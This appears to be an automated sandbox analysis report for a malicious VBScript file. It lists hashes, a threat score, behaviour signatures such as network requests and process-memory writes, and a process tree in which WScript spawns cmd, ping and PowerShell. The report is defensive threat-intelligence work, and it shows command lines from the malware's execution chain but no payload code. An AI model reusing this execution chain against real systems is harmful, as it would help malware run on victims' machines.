Analysis

  • max time kernel
    137s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
  • submitted
    23-05-2024 01:40

General

  • Target

    7c9097341df9125478424c57b39c394062838aaa04bcc5725cd4a49a3b3555d9.vbs

  • Size

    15KB

  • MD5

    3ed6d6263087df6acb50d383f9646c77

  • SHA1

    3d11f3a396909f4bdda0b8b8bb7ef6b8abbad17c

  • SHA256

    7c9097341df9125478424c57b39c394062838aaa04bcc5725cd4a49a3b3555d9

  • SHA512

    e5ce4ee9fb452025cff79e23c3f335fe8b34dce4e5b315e258815212ac9cd929881c690a95d397deec0c635a0115c4eb176b557e2e877449e9a9116f8dc99f64

  • SSDEEP

    192:3Kyq8AvxRaqxtLpoMPpzkd/5Bpt0yPPGEIv97BreF56xrkoAD+h0nVJ:ayqlZRzmMxI19PGn9kF0xrgD+m

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 17 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7c9097341df9125478424c57b39c394062838aaa04bcc5725cd4a49a3b3555d9.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • Runs ping.exe
        PID:2860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2936
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Subfumigation.San && echo t"
        3⤵
          PID:2472

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • memory/2936-4-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

      Filesize

      4KB

    • memory/2936-5-0x000000001B200000-0x000000001B4E2000-memory.dmp

      Filesize

      2.9MB

    • memory/2936-6-0x0000000002320000-0x0000000002328000-memory.dmp

      Filesize

      32KB

    • memory/2936-7-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

    • memory/2936-8-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

    • memory/2936-9-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

    • memory/2936-10-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

    • memory/2936-11-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

      Filesize

      9.6MB

    • memory/2936-12-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

      Filesize

      4KB